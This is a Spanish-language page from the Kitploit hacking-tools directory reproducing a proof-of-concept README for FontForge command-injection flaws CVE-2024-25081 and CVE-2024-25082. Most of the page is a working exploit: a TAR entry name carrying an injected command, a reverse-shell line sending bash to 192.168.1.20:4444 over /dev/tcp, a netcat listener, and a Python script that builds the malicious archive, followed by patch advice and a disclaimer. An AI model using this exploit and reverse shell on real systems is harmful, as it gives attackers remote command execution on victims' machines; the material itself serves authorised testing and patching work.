Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25082_CVE-2024-25081 — Vulnerabilidad de inyección de comandos en FontForge Splinefont por nombre de archivo manipulado | Kitploit
Herramientas/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

Vulnerabilidad de inyección de comandos en FontForge Splinefont por nombre de archivo manipulado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
14hace 6 mesesAún no revisado
Compartir

⚠️ FontForge RCE — CVE-2024-25081 y CVE-2024-25082 - PoC

📖 Resumen

Prueba de concepto para dos vulnerabilidades de inyección de comandos en FontForge ≤ 20230101 (componente Splinefont).

CVEVectorDesencadenante
CVE-2024-25081Nombre de archivo manipuladoApertura directa de archivo
CVE-2024-25082Nombre de archivo de archivo comprimido manipuladoExtracción de TAR/ZIP/GZ/BZ2

Este PoC se dirige a CVE-2024-25082 — la extracción automática de archivos comprimidos de FontForge pasa los nombres de archivo a un shell sin saneamiento, permitiendo que una carga útil delimitada por punto y coma incrustada en un nombre de entrada TAR ejecute comandos arbitrarios.


Cómo funciona

FontForge admite la apertura de archivos de fuente directamente desde archivos comprimidos. Al extraer un archivo TAR, el componente Splinefont construye un comando de shell usando el nombre de archivo de la entrada del archivo. Debido a que el nombre de archivo no está saneado, un punto y coma (;) en el nombre de la entrada rompe el comando esperado e inyecta instrucciones de shell arbitrarias.

Nombre de entrada TAR malicioso:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Cuando FontForge procesa este archivo, el shell interpreta esto como:

root@kitploit:~
<comando de extracción> exploit.ttf ; bash /tmp/s.sh ; 

Entorno

  • Software vulnerable: FontForge ≤ 20230101
  • Plataforma: Linux
  • Oyente atacante: 192.168.1.20:4444 (ajuste según sea necesario)

📋 Requisitos previos

  • Python 3 (solo biblioteca estándar, módulo tarfile)
  • netcat en la máquina atacante
  • FontForge ≤ 20230101 en la máquina objetivo

🛠️ Prueba de concepto

1. Inicie un oyente netcat en su máquina atacante

root@kitploit:~
nc -lvnp 4444

2. Genere el archivo TAR malicioso

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Abra el archivo en FontForge en el objetivo

root@kitploit:~
fontforge exploit.tar

Un shell inverso se conectará de vuelta a su oyente.


🔒 Parche

Corregido en FontForge después de 20230101 mediante PR #5367. Actualice a la última versión.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • Compilación manual: obtenga la última versión de fontforge/fontforge

🔍 Referencia

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • Corrección de FontForge PR #5367

⚖️ Aviso legal y términos

Este código de Prueba de Concepto (PoC) se proporciona solo con fines educativos y de pruebas de penetración autorizadas.

  • No se otorga permiso para modificar, redistribuir o usar este código para ningún otro propósito.
  • El uso o modificación no autorizados pueden ser ilegales y poco éticos.
  • Los autores no asumen ninguna responsabilidad por cualquier mal uso o daño.
Descargar herramienta